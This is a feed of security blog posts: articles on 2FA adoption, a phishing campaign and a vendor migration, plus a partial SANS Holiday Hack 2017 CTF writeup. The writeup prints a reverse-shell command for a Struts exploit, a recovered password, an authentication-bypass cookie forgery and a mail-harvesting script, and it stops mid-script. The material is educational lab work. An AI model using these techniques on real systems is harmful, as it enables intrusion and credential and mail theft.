For me, the ease of the ROAR, coupled with the lack of a monthly subscription and its advanced security, gives it a distinct advantage. After using both and looking at the implemented security, I’d personally recommend the ROAR product due to the amount of care and thought in its security model.

Hopefully this evaluation helped inform you if you were planning on purchasing one of these devices, and we hope the evaluation process gave you some insight into how one approaches testing the security of such devices.

]]>
<![CDATA[Two-Step Verification or Two Factor: 90% Don't Use it to Protect Gmail]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/two-step-verification-or-two-factor-90-dont-use-it-to-protect-gmail https://duo.com/blog/two-step-verification-or-two-factor-90-dont-use-it-to-protect-gmail Industry News Tue, 23 Jan 2018 00:00:00 -0500

Less than 10 percent of active Google accounts use two-step verification (2SV) to secure access to services like Gmail, according to Google software engineer Grzegorz Milka’s presentation at the USENIX Enigma 2018 security conference, as reported by The Register.

A Google and University of California research paper published last November, Data Breaches, Phishing or Malware? Understanding the Risks of Stolen Credentials, found that only 3.1 percent of users enabled two-factor authentication after successfully recovering their hijacked Gmail account. The discrepancy between security-aware and regular users is noted:

While experts commonly favor using two-factor authentication or password managers, these tools are virtually absent from the security posture of regular users.

Google’s longitudinal measurement study analyzed millions of keylogger and phishing kit victims from March 2016 to March 2017, including 1.9 billion usernames and passwords exposed as the result of data breaches.

Phishing by Month Source: Google

What is Two-Step Verification?

Two-step verification (2SV) is a term used interchangeably by tech giants such as Google and Apple for two-factor authentication (2FA), the technology that adds another layer of security to logins. Primary authentication typically consists of a username and password, while secondary authentication can be carried out through a variety of different methods.

Apple has updated their support documentation to state:

Two-step verification is an older security method that is available to users who don’t have Apple devices, can’t update their devices, or are otherwise ineligible for two-factor authentication.

By this definition, they equate SMS-based 2FA with the term ‘two-step verification.’ They also provide newer documentation on using two-factor authentication to protect your Apple ID.

The Most Secure Two-Factor Authentication Methods

One method requires downloading a free authenticator app for your smartphone that generates unique, time-based passcodes you can type or copy and paste into your Gmail login page. This allows you to verify your identity with not only your password, but also with a secondary, physical device.
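
Under the hood, those apps typically implement TOTP (RFC 6238): a shared secret plus the current time run through an HMAC yields the short numeric code. Below is a minimal sketch using only the Python standard library, assuming the common defaults of SHA-1, 30-second steps and 6 digits; the secret shown is a made-up example, not a real account key.

# Minimal TOTP sketch (RFC 6238 defaults: HMAC-SHA1, 30-second step, 6 digits).
import base64, hashlib, hmac, struct, time

def totp(base32_secret: str, step: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(base32_secret, casefold=True)
    counter = int(time.time()) // step                      # current time step
    msg = struct.pack(">Q", counter)                        # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                              # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))   # prints the current one-time passcode

A service holding the same secret computes the same value for the current time window, so a stolen password alone is not enough to complete the login.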

For enterprise-level or more advanced users interested in the most secure option available, using a physical USB device plugged into your computer to verify your identity provides protection against phishing attempts. By tapping it once, you can complete 2FA and log into your Gmail securely.

Yubikey USB Device

Source: Yubikey

Either of these methods takes just seconds to complete login, is free or requires a nominal amount of money and setup time (less than $20 for individual users, and cheaper in bulk for enterprise users), and the small extra step is well worth it to keep your account (and your data and access to other accounts) safe from theft.

So Many Ways to Phish

The main objective of a phishing email is to steal information by some means. One way is to send a user a phishing email with a link to a fake login page that spoofs a legitimate website, with a message that urges the user to log in. The credentials are then forwarded to the phisher.

Another way to steal credentials and other data is to send an email with exploit kit or malware attachments that, when opened, check the user’s computer for certain versions of software. If the right conditions are present, the malware will download and execute. The malware may include a keylogger or another type of malicious software that records every keystroke and sends this data to the phisher.

Phishing Kits

A phishing kit is a bundle of site resources that makes campaigns more efficient and reusable, enabling non-technical phishers to create spoofed websites and launch a phishing attack. For more information about phishing kits, read Phish in a Barrel: Hunting and Analyzing Phishing Kits at Scale.

Google’s report analyzed a sample of 10,037 phishing kits and about 3.8 million credentials that belonged to victims of the kits. They found that the most popular phishing kit was used by almost 3,000 attackers to steal 1.4 million credentials - this kit included a website that emulated Gmail, Yahoo and Hotmail logins. By far, Gmail was the most popular email provider used by phishers as exfiltration points to receive stolen credentials (72.3%).

The top phishing kits impersonate many other brands, including file storage services (Dropbox, Office 365), webmail providers (Workspace Webmail, AOL) and business services (Docusign, ZoomInfo).

Phishing kits collect not only credentials, but also additional information such as geolocation data, secret questions and device-related details.

This type of info can be used to bypass login challenges for services that attempt to detect suspicious login attempts.

The Consequences of Getting Access to Your Gmail

Why would an attacker want to access your Gmail account? As detailed by Google's Enigma presentation, an account hijacker could export your list of contacts (consisting of family, friends and coworkers) and send them phishing links to potentially gain access to their accounts.

According to Google’s report, a hijacker can also reset your passwords to other services, download all of your private data and remotely wipe your data and backups.

Once an account is compromised, hijackers will often search its email history for financial records and credentials related to third-party services, and use the account to spam and phish its contacts.

Google’s report referenced another report from 2014, Consequences of Connectivity: Characterizing Account Hijacking on Twitter, which found that 13.8 million compromised Twitter accounts were used to infect other users as well as to post spam. However, most users can avoid an account compromise by enabling two-step verification, a.k.a. two-factor authentication.

]]>
<![CDATA[Phishing Campaign Targets U.S. Senators & Political Organizations]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/phishing-campaign-targets-us-senators-and-political-organizations https://duo.com/blog/phishing-campaign-targets-us-senators-and-political-organizations Industry News Thu, 18 Jan 2018 08:30:00 -0500

Pawn Storm (aka Fancy Bear) has been attempting to phish webmail accounts for many years now, targeting U.S. senators and political organizations across the world, according to a recent Trend Micro report (PDF).

Targets include international and military organizations, ministries of defense, ministries of foreign affairs, intelligence units and defense contractors that provide IT services and engineering/robotics design for the U.S. government.

Reports of a campaign targeting the U.S. Senate come amid the release of a separate Minority Staff Report (PDF) detailing the need to secure the 2018 and 2020 U.S. elections against foreign state hacking.

Phishing sites were set up last June to mimic the Senate's Active Directory Federation Services (ADFS) server, according to BankInfoSecurity. The server provides single sign-on access to multiple organizations' systems and applications.

While the U.S. Senate's ADFS server isn't Internet-facing, phishing their users' credentials can help attackers move laterally and target high-profile users of interest.

Additional Threat Techniques

The report describes the use of 'tabnabbing.' The hacking group sends an email to a user with a link - when the user clicks on it, a new tab opens showing a legitimate news or conference website. Meanwhile, the user's other tab, their webmail, is changed via JavaScript to a phishing site that prompts the user to log in again due to a supposedly expired session.

Another technique involves using stolen DNS administrator credentials to compromise the DNS settings of mail servers, changing them to point to a foreign server, according to Trend Micro. This allows an attacker to receive all incoming mail that would normally be sent to the victim organization. The Ministry of Foreign Affairs in an Eastern European country was the target of one such attack.

Finally, an analysis of the spear phishing email headers shows that the group's content strategy centers around using recent, newsworthy events to entice users to open the email messages.

Mitigation Recommendations

While two-factor authentication (2FA) can help stop attackers from logging into accounts with phished credentials, it's important to use the most secure method available.

SMS-based 2FA can be easily phished, rendering it less secure than using a physical security key to verify your identity before logging into webmail or other applications. An attacker would need physical access to your security key and laptop in order to compromise this method of authentication.

U2F, or Universal 2nd Factor, is an authentication standard developed by the FIDO (Fast IDentity Online) Alliance that uses strong public key cryptography to secure login access - it's been deployed by Facebook, Gmail, Salesforce.com, the U.K. government and many others, as noted by Yubico.

The method allows a user to tap a USB device plugged into their laptop to quickly and securely log in, protecting against phishing, man-in-the-middle and other threats. This method uses something you have to verify your identity.
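
At its core, U2F is a challenge-response protocol built on public key cryptography: the security key holds a private key, signs a server-supplied challenge bound to the site's origin, and the server verifies the signature with the registered public key. The Python sketch below (using the third-party cryptography package) illustrates that flow conceptually; it is a simplification with made-up names and origins, not the actual U2F/FIDO message format.

# Conceptual sketch of U2F-style challenge-response (not the real wire format).
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.exceptions import InvalidSignature

# Registration: the security key generates a key pair; the server stores the public key.
device_private_key = ec.generate_private_key(ec.SECP256R1())
server_stored_public_key = device_private_key.public_key()

# Login: the server issues a random challenge tied to the expected origin.
challenge = os.urandom(32)
origin = b"https://mail.example.com"      # hypothetical origin

# The security key signs challenge + origin only after the user taps it.
signature = device_private_key.sign(challenge + origin, ec.ECDSA(hashes.SHA256()))

# The server verifies the signature over the origin it expects, so a phishing
# site at a different origin cannot produce or replay a valid response.
try:
    server_stored_public_key.verify(signature, challenge + origin, ec.ECDSA(hashes.SHA256()))
    print("login approved")
except InvalidSignature:
    print("login rejected")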

Additional methods may include biometrics-based authentication, such as fingerprint ID, which has been integrated into consumer products such as iPhones and Android devices. This adds another layer of security to verify your identity through a different factor, known as something you are.

While phishing can work to steal passwords, malicious emails can also contain malware attachments used to infect and compromise devices. Users that log into your networks with infected devices can introduce new risks, and allow attackers entry. Endpoint security solutions can help you identify risky devices, encourage users to remediate, and block devices from logging into your company resources. When it comes to security protection, organizations need to ensure the trust of both users and their devices before granting them access.

]]>
<![CDATA[Moving from SecurID to Duo: A Customer’s Journey]]> isharpe@duo.com(Ian Sharpe) https://duo.com/blog/moving-from-securid-to-duo-a-customers-journey https://duo.com/blog/moving-from-securid-to-duo-a-customers-journey Product Updates Tue, 16 Jan 2018 00:00:00 -0500

In a previous blog post, we highlighted why customers are replacing RSA with Duo Security. We discussed how companies are leveraging Duo’s modern security solution to help them solve fundamental security challenges around access management. Additionally, we discussed other major drivers that propelled these companies to migrate from RSA, which included improved end user experience, easy and intuitive administration, and affordability.

If you are still determining if migrating from a legacy provider is the right direction for your organization, check out our ebooks. Our customers have found our Two-Factor Authentication Evaluation Guide and The Essential Guide To Securing Remote Access helpful in making an informed decision.

The Evolution of MFA

The modern workforce demands more flexibility and convenience. Their expectations on how enterprise security applications should function have changed based on the user experience they enjoy with consumer applications like Facebook. In their minds, ease of use and security should no longer be at odds.

We agree - that’s why we’re focused on ensuring security is simple for everyone. In our opinion, simplicity leads to security effectiveness across an organization. One of our core product design philosophies is creating an exceptional user experience for every user, regardless of their technical prowess. This ensures seamless and secure access to applications, systems and data with limited circumvention of security controls.

Another sign of the modernization and evolution of MFA was the updated NIST 800-63-3 Digital Identity Guidelines, which allow companies to leverage new forms of authenticators, such as Duo Push, as opposed to previous guidelines that recommended tokens. You can read more about these changes here.

Ready for a Change

We understand that replacing a legacy provider can be a difficult journey. You have history and integrations. You thought things would change and get better; heck, they promised you that they would. Unfortunately, too many promises have been made with little-to-no delivery. You’ve come to the realization that the way things are doesn’t need to continue. You are ready for a change.

Duo has assisted countless customers through migration from legacy providers. This migration has helped them advance their security programs while future-proofing their security technologies.

Our vision is to provide you a scalable security technology platform that aligns with your company’s long-term security strategy for access management.

3… 2… 1… Liftoff!

We have leveraged our experience with these customers and developed a comprehensive Liftoff Guide to ensure success during a migration. This guide consists of the following helpful components:

  • Success Planning: We take time to understand your environment, develop the proper solution architecture and decide which deployment method best meets your needs.
  • Application Configuration and Testing: We provide easy-to-search configuration documentation and best practice guides that help you get up and running quickly and independently.
  • End User Communication: We provide user-friendly email templates and resources to enable full transparency of the migration to your user population. It is one of the first steps toward showing your users just how easy being secure really is.
  • Help Desk Training: With change, your user population may have questions. Duo prides itself on being extremely user-friendly; however, in the event that you need additional help, we arm your support team with a handy help desk guide.
  • Duo Go-Live: With those four simple steps, you are ready to make the change.

Duo Customer Journey

Want to learn more about how we can make you successful in your migration? Check out our Liftoff Guide.

Happy Customers

Duo is dedicated to making you successful. Here are a couple of testimonials from some of the customers we have helped migrate from legacy two-factor authentication providers.

“The transition from RSA tokens to Duo was seamless. Users love the solution. They find it easy to use and reliable, resulting in one less headache for IT.”

-- Ely Garcia, CTO, Cisneros Group of Companies

“The migration to Duo was seamless. Users new to MFA found the solution easy to use and understand. Individuals using our existing MFA, or who used different MFA providers at other institutions, were impressed with Duo’s intuitive functionality and have been very pleased with the transition.”

-- Chad Spiers, Director of Information Security, Sentara Healthcare

Making the Switch

Interested in getting additional insights about how Duo has helped hundreds of businesses make the switch from legacy two-factor authentication and access control solutions to our services? Join us at our upcoming Moving from RSA SecurID to Duo Security: A Customer’s Journey webinar on January 25, 2018 at 12:00pm EST | 9:00am PST.

]]>
<![CDATA[SANS Holiday Hack 2017 Writeup]]> jwright@duo.com(Jordan Wright)nsteele@duo.com(Nick Steele)pbruienne@duo.com(Pepijn Bruienne) https://duo.com/blog/sans-holiday-hack-2017-writeup https://duo.com/blog/sans-holiday-hack-2017-writeup Duo Labs Thu, 11 Jan 2018 08:30:00 -0500

Every year during the holiday season, SANS publishes their annual Holiday Hack Challenge. These challenges are a great way to learn new and useful exploitation techniques to solve fun puzzles.

The Duo Labs team always enjoys participating in the Holiday Hack Challenges, and we have written about our solutions in the past. The challenges have been very polished, and this year is no exception.

As always, we first want to extend our thanks to Ed Skoudis and the SANS team for always putting together a thorough, fun challenge that never fails to teach something new.

The goal of this year’s Holiday Hack Challenge was to find out who has been throwing giant snowballs at the North Pole. This involves solving eight technical challenges, each containing both a main storyline challenge as well as a mini-challenge in the form of a “Cranberry Pi” terminal. As part of the solution, we are asked to collect seven pages from The Great Book, which give information about who our villain might be.

It’s important to note that there is also a video game component to this year’s challenge, but to keep this writeup short, we’ll only mention those solutions when they are relevant to the challenge solutions.


Table of Contents

  1. Problem 1 - The First Great Book Page
    1. Terminal - Winter Wonder Landing
  2. Problem 2 - Letters to Santa Application
    1. SSH Tunneling
    2. Terminal - Winconceivable: The Cliffs of Winsanity
  3. Problem 3 - The SMB Server
    1. Terminal: Cryokinetic Magic
  4. Problem 4 - Elf Webmail Server
    1. Terminal: There’s Snow Place Like Home
  5. Problem 5 - Santa’s Naughty or Nice List
    1. Terminal: Bumble to Stray
  6. Problem 6 - Elf-as-a-Service
    1. Terminal: I Don’t Think We’re In Kansas Anymore
  7. Problem 7 - SCADA System (EMI)
    1. Terminal: Oh Wait! Maybe We Are
  8. Problem 8 - Elf Database
    1. Terminal: We’re Off To See The...
  9. Problem 9 - Villain Reveal

Problem 1 - The First Great Book Page

Opening the Holiday Hack Challenge interface, we’re presented with a game map showing various levels we need to solve: Game Map

Terminal - Winter Wonder Landing

The terminal in the Winter Wonder Landing level presents the following prompt:

My name is Bushy Evergreen, and I have a problem for you.
I think a server got owned, and I can only offer a clue.
We use the system for chat, to keep toy production running.
Can you help us recover from the server connection shunning?
Find and run the elftalkd binary to complete this challenge.
elf@24e7eaaef2cc:~$

Standard searching tools like find and locate aren’t available, so we can use a mixture of ls and grep:

$ ls -alR | grep -B 5 elftalkd
./run/elftalk/bin:
total 7224
drwxr-xr-x 1 root root    4096 Dec  4 14:32 .
drwxr-xr-x 1 root root    4096 Dec  4 14:32 ..
-rwxr-xr-x 1 root root 7385168 Dec  4 14:29 elftalkd

Running the binary gives this output:

$ ./elftalkd 
        Running in interactive mode
        --== Initializing elftalkd ==--
Initializing Messaging System!
Nice-O-Meter configured to 0.90 sensitivity.
Acquiring messages from local networks...
--== Initialization Complete ==--
      _  __ _        _ _       _ 
     | |/ _| |      | | |     | |
  ___| | |_| |_ __ _| | | ____| |
 / _ \ |  _| __/ _` | | |/ / _` |
|  __/ | | | || (_| | |   < (_| |
 \___|_|_|  \__\__,_|_|_|\_\__,_|
-*> elftalkd! <*-
Version 9000.1 (Build 31337) 
By Santa Claus & The Elf Team
Copyright (C) 2017 NotActuallyCopyrighted. No actual rights reserved.
Using libc6 version 2.23-0ubuntu9
LANG=en_US.UTF-8
Timezone=UTC
Commencing Elf Talk Daemon (pid=6021)... done!
Background daemon...

And it tells us we completed the challenge. Here’s the question given in the storyline:

1) Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?

This was one of the few instances where The Great Book page is obtained by solving the video game challenge. After solving the level, we’re presented with our first Great Book page:

Title: “About This Book”
Hash: 6dda7650725302f59ea42047206bd4ee5f928d19

Problem 2 - Letters to Santa Application

Here’s the next question we’re asked to solve:

2) Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password?

Navigating to l2s.northpolechristmastown.com, we see a web application designed to let anyone send a letter to Santa: Santa Web App

Viewing the source of the page, we see this:

    <!-- Development version -->
    <a href="http://dev.northpolechristmastown.com" style="display: none;">Access Development Version</a>

Doing a quick check, we can see that dev.northpolechristmastown.com is located at the same IP address as l2s.northpolechristmastown.com:

$ nslookup dev.northpolechristmastown.com
Non-authoritative answer:
Name:   dev.northpolechristmastown.com
Address: 35.185.84.51
$ nslookup l2s.northpolechristmastown.com
Non-authoritative answer:
Name:   l2s.northpolechristmastown.com
Address: 35.185.84.51

This means that if we compromise the development instance, we will likely compromise the production application. Visiting the development URL, we see what appears to be a Toy Request Form.

At the bottom of the HTML source, we can see a message indicating the server is using Apache Struts:

    <div id="the-footer"><p class="center-it">Powered By: <a href="https://struts.apache.org/">Apache Struts</a></p></div>
    <!-- Friend over at Equal-facts Inc recommended this framework-->

It’s likely that we can leverage one of the recent high-profile vulnerabilities in Apache Struts to gain access to the server. This blog post from SANS points to revised code that exploits CVE-2017-9805 against Apache Struts. We can use this code to open an interactive reverse shell to a server we control using Netcat.

First, we’ll create a Netcat listener on our server:

$ nc -l -v -p 1234

Then, we can run the exploit against the developer instance, establishing the reverse shell:

python cve-2017-9805.py -u https://dev.northpolechristmastown.com/orders.xhtml -c "nc -e /bin/sh x.x.x.x 1234"

Back on our listener, we are given a shell that can be used to explore the system:

whoami
alabaster_snowball
ls var/www/html
css
fonts
GreatBookPage2.pdf
imgs
index.html
js
process.php
tom.html

Requesting https://l2s.northpolechristmastown.com/GreatBookPage2.pdf gives us the second page of The Great Book, which covers the topic of flying animals.

Title: “On the Topic of Flying Animals”
Hash: aa814d1c25455480942cb4106e6cde84be86fb30

Our next task is to find the password for alabaster_snowball. Digging through the system, we find the password stream_unhappy_buy_loss in one of the web application source files:

cat /opt/apache-tomcat/webapps/ROOT/WEB-INF/classes/org/demo/rest/example/OrderMySql.class
    public class Connect {
            final String host = "localhost";
            final String username = "alabaster_snowball";
            final String password = "stream_unhappy_buy_loss";
            String connectionURL = "jdbc:mysql://" + host + ":3306/db?user=;password=";

SSH Tunneling

Now that we have exploited the Letters to Santa server and retrieved Alabaster Snowball’s password, we can try to use the password to SSH to the server directly. This offers multiple benefits over our reverse shell, including the ability to easily tunnel connections to internal services.

Attempting to SSH to the server using the credentials alabaster_snowball:stream_unhappy_buy_loss works and puts us in a restricted shell:

holidayhack@holidayhack:~$ ssh alabaster_snowball@dev.northpolechristmastown.com
alabaster_snowball@hhc17-apache-struts2:/tmp/asnow.DizJJkLYXfIMeNPc1TIkEIed$

With this confirmed to be working, we can use SSH local tunneling to hit internal services through the Letters to Santa server. For example, to forward connections to TCP port 8888 on our client to TCP port 80 on internal_service.northpolechristmastown, we can establish an SSH session like this:

$ ssh -L 8888:internal_service.northpolechristmastown.com:80 -N alabaster_snowball@dev.northpolechristmastown.com

This creates a network flow like this: Network Flow

We will use this frequently in the remainder of the writeup to hit internal services.

Terminal - Winconceivable: The Cliffs of Winsanity

Opening the Cranberry Pi in the “Winconceivable: The Cliffs of Winsanity” level gives a prompt telling us we need to find a way to kill the santaslittlehelperd process:

My name is Sparkle Redberry, and I need your help.
My server is atwist, and I fear I may yelp.
Help me kill the troublesome process gone awry.
I will return the favor with a gift before nigh.
Kill the "santaslittlehelperd" process to complete this challenge.

We can use ps and grep to verify the process is running:

elf@07b771d93d82:~$ ps aux | grep santaslittlehelperd
elf          8  0.0  0.0   4224   724 pts/0    S    03:22   0:00 /usr/bin/santaslittlehelperd

But when we try to kill the process it doesn’t seem to work:

elf@07b771d93d82:~$ kill -9 8
elf@07b771d93d82:~$ ps aux | grep santaslittlehelperd
elf          8  0.0  0.0   4224   724 pts/0    S    03:22   0:00 /usr/bin/santaslittlehelperd

Looking through our aliases indicates that the various commands used to send signals to processes (such as kill, killall, etc.) have been aliased to true:

$ alias
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias grep='grep --color=auto'
alias kill='true'
alias killall='true'
alias l='ls -CF'
alias la='ls -A'
alias ll='ls -alF'
alias ls='ls --color=auto'
alias pkill='true'
alias skill='true'

To beat the challenge, we can just unalias the command and kill the process:

elf@f8ec669d6f52:~$ ps aux | grep santaslittlehelperd
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
elf          8  0.0  0.0   4224   640 pts/0    S    16:50   0:00 /usr/bin/santaslittlehelperd
elf@f8ec669d6f52:~$ unalias kill
elf@f8ec669d6f52:~$ kill -9 8
elf@f8ec669d6f52:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
elf          1  0.1  0.0  18028  2864 pts/0    Ss   16:50   0:00 /bin/bash /sbin/init
elf         12  0.0  0.0  18248  3324 pts/0    S    16:50   0:00 /bin/bash
elf         59  0.0  0.0  34424  2864 pts/0    R+   16:51   0:00 ps aux

Problem 3 - The SMB Server

Here’s the next question we’re asked to solve:

3) The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?

From our ssh tunnel, we do a nmap scan on the internal network and find that 10.142.0.7 and 10.142.0.8 have SMB services open:

$ nmap -v -Pn -p 139,445 10.142.0.0/24
Starting Nmap 7.40 ( https://nmap.org ) at 2018-01-04 17:15 UTC
Initiating Parallel DNS resolution of 256 hosts. at 17:15
Completed Parallel DNS resolution of 256 hosts. at 17:15, 0.04s elapsed
Initiating Connect Scan at 17:15
Scanning 256 hosts [2 ports/host]
Discovered open port 139/tcp on 10.142.0.7
Discovered open port 139/tcp on 10.142.0.8
Discovered open port 445/tcp on 10.142.0.8
Discovered open port 445/tcp on 10.142.0.7
Completed Connect Scan at 17:15, 2.40s elapsed (512 total ports)
<snip>
Nmap scan report for hhc17-smb-server.c.holidayhack2017.internal (10.142.0.7)
Host is up (0.0011s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

We can scan these hosts more aggressively (by using nmap’s -A flag) to enumerate them and discover that 10.142.0.7 resolves to hhc17-smb-server.c.holidayhack2017.internal while 10.142.0.8 resolves to hhc17-emi-server.c.holidayhack2017.internal.

Having identified the SMB service on 10.142.0.7 (the other host is the Elf-Machine Interface server used for problem 7), we can use the smbclient utility to access the service and list out the available shares. First, we set up a tunnel to the SMB server:

$ ssh -L 4445:10.142.0.7:445 -N alabaster_snowball@dev.northpolechristmastown.com

Next, we can enumerate through the possible shares by using Alabaster’s password to login:

$ smbclient --user=alabaster_snowball -p 4445 -L localhost
Enter alabaster_snowball's password:
Domain=[HHC17-EMI] OS=[Windows Server 2016 Datacenter 14393] Server=[Windows Server 2016 Datacenter 6.3]
    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    FileStor        Disk
    IPC$            IPC       Remote IPC
Connection to localhost failed (Error NT_STATUS_CONNECTION_REFUSED)
NetBIOS over TCP disabled -- no workgroup available

We see that there’s a sharename available for “FileStor” on the SMB Server. We can connect to that store and retrieve all the files like this:

$ smbclient \\\\localhost\\FileStor -U alabaster_snowball -p 4445
Enter alabaster_snowball's password:
Domain=[HHC17-EMI] OS=[Windows Server 2016 Datacenter 14393] Server=[Windows Server 2016 Datacenter 6.3]
smb: \> ls
  .                                   D        0  Wed Jan  3 04:30:56 2018
  ..                                  D        0  Wed Jan  3 04:30:56 2018
  BOLO - Munchkin Mole Report.docx      A   255520  Wed Dec  6 21:44:17 2017
  GreatBookPage3.pdf                  A  1275756  Mon Dec  4 19:21:44 2017
  MEMO - Password Policy Reminder.docx      A   133295  Wed Dec  6 21:47:28 2017
  Naughty and Nice List.csv           A    10245  Thu Nov 30 19:42:00 2017
  Naughty and Nice List.docx          A    60344  Wed Dec  6 21:51:25 2017
        13106687 blocks of size 4096. 9618575 blocks available
smb: \> mget *

This gives us 4 files we can use for further investigation, as well as page 3 of The Great Book.

Title: “The Great Schism”
Hash: 57737da397cbfda84e88b573cd96d45fcf34a5da

Terminal: Cryokinetic Magic

Visiting the Cryokinetic Magic level gives this prompt:

My name is Holly Evergreen, and I have a conundrum.
I broke the candy cane striper, and I'm near throwing a tantrum.
Assembly lines have stopped since the elves can't get their candy cane fix.
We hope you can start the striper once again, with your vast bag of tricks.
Run the CandyCaneStriper executable to complete this challenge.

Looking at the output of ls, we see that the file isn’t executable:

ls -alh CandyCaneStriper 
-rw-r--r-- 1 root root 45K Dec 15 13:28 CandyCaneStriper

There are two ways we can solve this challenge. First, since we have read permissions, we can make a copy of the file and then give executable permissions to our copy:

elf@87cf1577db7d:~$ cp CandyCaneStriper candy
elf@87cf1577db7d:~$ ls -alh
total 116K
drwxr-xr-x 1 elf  elf  4.0K Dec 15 17:29 .
drwxr-xr-x 1 root root 4.0K Dec  5 19:31 ..
-rw-r--r-- 1 elf  elf   220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 root root 3.1K Dec 15 13:28 .bashrc
-rw-r--r-- 1 elf  elf   655 May 16  2017 .profile
-rw-r--r-- 1 root root  45K Dec 15 13:28 CandyCaneStriper
-rw-r--r-- 1 elf  elf   45K Dec 15 17:29 candy

However, after making our copy we find that we can’t use chmod, since it’s been nulled out:

elf@87cf1577db7d:~$ ls -alh /bin/chmod
-rwxr-xr-x 1 root root 0 Dec 15 13:40 /bin/chmod

There are tips on how to handle this here, with one being to use Perl to change the file permissions:

elf@87cf1577db7d:~$ perl -e 'chmod 0755, "candy"'
elf@87cf1577db7d:~$ ls -alh candy
-rwxr-xr-x 1 elf  elf   45K Dec 15 17:29 candy

Now we can execute the binary, solving the challenge:

elf@87cf1577db7d:~$ ./candy 
The candy cane striping machine is up and running!

The second way we can solve this challenge is by calling the /lib64/ld-linux-x86-64.so.2 shared library loader directly:

elf@44683555699a:~$ /lib64/ld-linux-x86-64.so.2 ./CandyCaneStriper 
The candy cane striping machine is up and running!

Problem 4 - Elf Webmail Server

The next question asks us to retrieve a Great Book page from the Elf Web Access (EWA) server:

4) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?

A quick nmap scan of mail.northpolechristmastown.com through our SSH tunnel shows a couple of services available, but we’ll focus on the web application available on TCP port 80:

80/tcp   open  http    nginx 1.10.3 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/cookie.txt

In the process of enumerating services on the host, nmap found a robots.txt file that disallows requests to /cookie.txt. We can verify this manually by requesting mail.northpolechristmastown.com/robots.txt:

$ curl mail.northpolechristmastown.com/robots.txt
User-agent: *
Disallow: /cookie.txt

Requesting /cookie.txt reveals what appears to be source code for generating and verifying authentication cookies that was “accidentally” left on the server. You can find the full source here, but the snippet we’re interested in is responsible for decrypting and verifying the cookie contents:

var plaintext = aes256.decrypt(key, ciphertext);
//If the plaintext and ciphertext are the same, then it means the data was encrypted with the same key
if (plaintext === thecookie.plaintext) {
    return callback(true, username);
} else {
    return callback(false, '');
}

This code takes the provided JSON contents in the cookie and attempts to decrypt the ciphertext attribute using AES256 and an unknown key. If the decrypted contents match the plaintext provided in the cookie, it assumes the plaintext was generated by the server and can be trusted.

A hint given in this challenge suggests that, since we control the entire ciphertext, perhaps there could be odd behavior if we only send a 16 byte IV and don’t send any actual data.

Since it appears the encryption/decryption operates on base64 encoded data, it’s likely the AES256 library being used is something similar to this.

Let’s start by generating 16 bytes of random data as our IV and base64 encoding it to get our ciphertext:

$ echo -n "AAAAAAAAAAAAAAAA" | base64
QUFBQUFBQUFBQUFBQUFBQQ==

Then, we can try to decrypt this ciphertext using the aes256 package:

> var aes256 = require('aes256');
> aes256.decrypt('random key', 'QUFBQUFBQUFBQUFBQUFBQQ==')
''

We can see that by only sending 16 bytes, there isn’t any data to decrypt, causing the library to return an empty string. This means that by sending 16 bytes as our ciphertext, and an empty plaintext, the check will pass and we can log in as any user we want.

For example, to log in as alabaster.snowball@northpolechristmastown, we can use this cookie:

{"name":"alabaster.snowball@northpolechristmastown.com","plaintext":"","ciphertext":"QUFBQUFBQUFBQUFBQUFBQQ=="}

This logs us in to the webmail service: Elf Webmail Service

The emails in Alabaster’s inbox show that there are multiple users on the system. It would be useful to pull all the emails for every user and list those in an easy-to-read format. Looking through the Javascript on the page, we can see that sending and receiving emails is done via a JSON API at the /api.js endpoint. The file custom.js lists two of the possible API actions:

$.post( "api.js", { getmail: 'getmail'})
$.post( "api.js", { from_email: theuser, to_email: to, subject_email: subject, message_email: message})

The getmail action likely gets the emails for the currently logged on user. We can write a script that logs in as every user and retrieves all their emails, logging who the email is to, who the email is from, the subject, and the message.
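
Here’s a minimal sketch of such a script. It assumes the forged cookie is sent under a hypothetical cookie name of EWA, that we reach the webmail host through our SSH tunnel on local port 8888, and that /api.js returns a JSON list of messages; the elf addresses and the message field names are placeholders, so adjust them to match what the inbox actually returns:

import csv
import json
import requests

# Assumptions (hypothetical): localhost:8888 is tunneled to the webmail
# server, the auth cookie is named "EWA," and these addresses were gathered
# from Alabaster's inbox.
BASE_URL = "http://localhost:8888"
USERS = [
    "alabaster.snowball@northpolechristmastown.com",
    "holly.evergreen@northpolechristmastown.com",
]

def get_mail(user):
    # Forge the cookie: empty plaintext plus a 16-byte "ciphertext."
    cookie = json.dumps({
        "name": user,
        "plaintext": "",
        "ciphertext": "QUFBQUFBQUFBQUFBQUFBQQ==",
    })
    resp = requests.post(
        BASE_URL + "/api.js",
        data={"getmail": "getmail"},
        cookies={"EWA": cookie},
    )
    return resp.json()

with open("emails.csv", "w", newline="") as fh:
    writer = csv.writer(fh)
    writer.writerow(["to", "from", "subject", "message"])
    for user in USERS:
        for email in get_mail(user):
            # The key names here are guesses; dump the raw JSON if they differ.
            writer.writerow([email.get("to"), email.get("from"),
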